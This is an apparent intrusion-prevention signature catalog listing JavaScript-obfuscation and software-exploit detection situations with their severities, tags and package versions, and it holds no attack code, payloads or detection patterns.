First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Alert-Exception-Obfuscation

About this situation: Detected an obfuscated JavaScript
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Cookie-Xor-Obfuscation-Method

About this situation: Detected an obfuscated JavaScript
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, MS2011-02, CVE2010, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: JavaScript-Obfuscation
Microsoft-Internet-Explorer-CVE-2010-3971
Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_JavaScript-Create-Noscript-Element

About this situation: Attempts to generate noscript elements in JavaScript detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: JavaScript-Create-Noscript-Element
Description:
Back to top

File-Text_JavaScript-Document-Object-Obfuscation

About this situation: Obfuscated JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Dual-Custom-Function-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Escaped-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Eval-Function-Overridden

About this situation: Detected a suspicious script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-FromCharCode-Obfuscation-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1223-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-FromCharCode-Obfuscation-Detected-2

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Function-Obfuscation

About this situation: Obfuscated JavaScript function detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1261-5242
Description:
Back to top

File-Text_JavaScript-Inline-Comment-Obfuscation

About this situation: Obfuscated JavaScript detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Innerhtml-Property-Obfuscation

About this situation: Obfuscated innerHTML property detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-LOIC-Download

About this situation: JavaScript LOIC source code download detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: LOIC-DoS-Tool
Description:
Back to top

File-Text_JavaScript-Obfuscated-With-Hangul-Filler-Characters

About this situation: A suspicious webpage containing obfuscated JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: JavaScript-Obfuscated-With-Hangul-Filler-Characters
Description:
Back to top

File-Text_JavaScript-Obfuscation-Method-Detected

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-833-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Object-Instantiation-Obfuscation

About this situation: Obfuscated JavaScript object instantiation detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Packed-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-744-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Reference-To-Program-Files-Resource

About this situation: Malicious JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-926-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Replace-Obfuscation

About this situation: Detected an obfuscated JavaScript
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Self-Reference

About this situation: Detected a script with a self reference
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-489-5211
Vulnerability: Script-Self-Reference
Description:
Back to top

File-Text_JavaScript-ShellCode-Generation

About this situation: Suspicious JavaScript code detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, CVE2011, CVE2012, Any Operating System not specific, Generic browser not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1261-5242
Vulnerability: JavaScript-ShellCode-Generation
Mozilla-Firefox-Remote-Code-Execution
Asus-Net4Switch-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_JavaScript-ShellCode-Generation-2

About this situation: Suspicious JavaScript code detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-667-5211
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

File-Text_JavaScript-ShellCode-Generation-3

About this situation: Suspicious JavaScript code detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

File-Text_JavaScript-ShellCode-Generation-4

About this situation: Suspicious JavaScript code detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-ShellCode-Generation
Description:
Back to top

File-Text_JavaScript-Split-Comment-Obfuscation

About this situation: Obfuscated JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-882-5242
Last changed: sgpkg-ips-882-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Split-With-Non-Ascii-Separator

About this situation: Obfuscated JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-845-5242
Last changed: sgpkg-ips-1432-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-String-Split-Obfuscation

About this situation: Obfuscated JavaScript Split method detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-String-Value-Obfuscation

About this situation: Obfuscated string value detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1661-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

About this situation: Suspicious JavaScript fragment detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2012, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
McAfee-Virtual-Technician-Remote-Code-Execution
Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion
Description:
Back to top

File-Text_JavaScript-Strings-Reverse-Encoded

About this situation: Obfuscated javascripts detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-965-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Suspicious-External-Reference

About this situation: Detected an obfuscated JavaScript
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-995-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Suspicious-Function-Name-Crash

About this situation: Detected a suspicious JavaScript function name
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-625-5211
Vulnerability: JavaScript-Suspicious-Function-Name
Description:
Back to top

File-Text_JavaScript-Suspicious-Function-Name-Exploit

About this situation: Detected a suspicious JavaScript function name
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: JavaScript-Suspicious-Function-Name
Description:
Back to top

File-Text_JavaScript-Suspicious-Function-Name-Heapspray

About this situation: Detected a suspicious JavaScript function Name
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: JavaScript-Suspicious-Function-Name
Description:
Back to top

File-Text_JavaScript-Suspicious-String-Reversal

About this situation: A potentially malicious file
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1186-5242
Description:
Back to top

File-Text_JavaScript-Unescape-Obfuscation-Access-With-Outdated-Browser

About this situation: Detected an older browser version accessing an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Unescape-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Unescape-Obfuscation-Method-2

About this situation: Detected an obfuscated JavaScript
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Xor-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-489-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-Xor-One-Time-Pad-Obfuscation-Method

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript_Injected-Wordpress

About this situation: Traffic that resembles a known injected JavaScript pattern detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: JavaScript_Injected-Wordpress
Description:
Back to top

File-Text_Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Active Choices Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Active Choices Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Jenkins-Ci-Server-Xstream-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Jenkins-Ci-Server-Xstream-Insecure-Deserialization
Description:
Back to top

File-Text_Jenkins-Git-Client-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Jenkins Git Client Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1367-5242
Vulnerability: Jenkins-Git-Client-Remote-Command-Execution
Description:
Back to top

File-Text_Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins GitLab Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins GitLab Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Vulnerability: Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Rundeck Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Rundeck Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, JetBrains TeamCity, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039
Description:
Back to top

File-Text_Jfogs-Obfuscated-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Jjencode-Obfuscated-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1167-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Joplin-Mdtohtml-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Joplin Project Joplin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Joplin, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Joplin-Mdtohtml-Cross-Site-Scripting
Description:
Back to top

File-Text_jQuery-Cross-Site-Scripting-CVE-2020-11023

About this situation: An attempt to exploit a vulnerability in jQuery detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, jQuery, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Vulnerability: jQuery-Cross-Site-Scripting-CVE-2020-11023
Description:
Back to top

File-Text_JS-Obfuscator-Obfuscated-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JS-Obfuscator-Obfuscated-Malicious-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JScript-Obfuscated-Reference

About this situation: Detected an obfuscated script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JSFuck-JavaScript-Obfuscation

About this situation: JSFuck Javascript obfuscation usage detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: JSFuck-JavaScript-Obfuscation
Description:
Back to top

File-Text_JSON-Object-With-Unnecessarily-Escaped-Characters

About this situation: A request containing a suspicious JSON object detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1775-5242
Vulnerability: JSON-Object-With-Unnecessarily-Escaped-Characters
Description:
Back to top

File-Text_Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Juniper SSL-VPN Client Setup ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Juniper Networks SSL-VPN Client, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_KaiXin-Exploit-Kit-Landing-Page

About this situation: Access to suspected KaiXin Exploit Kit landing page detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1282-5242
Vulnerability: KaiXin-Exploit-Kit
Description:
Back to top

File-Text_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262

About this situation: An attempt to exploit a vulnerability in Kingsoft WPS Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Kingsoft WPS Office, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
Description:
Back to top

File-Text_Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS

About this situation: An attempt to exploit a Konqueror FTP Iframe Null Pointer Dereference DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Konqueror, CVE2007, Linux not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-671-5211
Vulnerability: Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS
Description:
Back to top

File-Text_Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LEAD Technologies LEADTOOLS Raster Twain detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, LEAD Technologies LEADTOOLS Raster Twain, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Lethic-Activity

About this situation: Lethic activity detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Lethic
Description:
Back to top

File-Text_LG-Simple-Editor-Copystickercontent-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: LG-Simple-Editor-Copystickercontent-Directory-Traversal
Description:
Back to top

File-Text_LG-Simple-Editor-Copytemplateall-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: LG-Simple-Editor-Copytemplateall-Directory-Traversal
Description:
Back to top

File-Text_LG-Simple-Editor-Savexml-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: LG-Simple-Editor-Savexml-Directory-Traversal
Description:
Back to top

File-Text_Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641

About this situation: An attempt to exploit a vulnerability in Libcue detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libcue, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1639-5242
Vulnerability: Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641
Description:
Back to top

File-Text_LibreOffice-Hsqldb-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in LibreOffice detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: LibreOffice-Hsqldb-Arbitrary-File-Write
Description:
Back to top

File-Text_Libvpx-Heap-Buffer-Overflow-CVE-2023-5217

About this situation: An attempt to exploit a vulnerability in libvpx detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Safari, Chrome, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Libvpx-Heap-Buffer-Overflow-CVE-2023-5217
Description:
Back to top

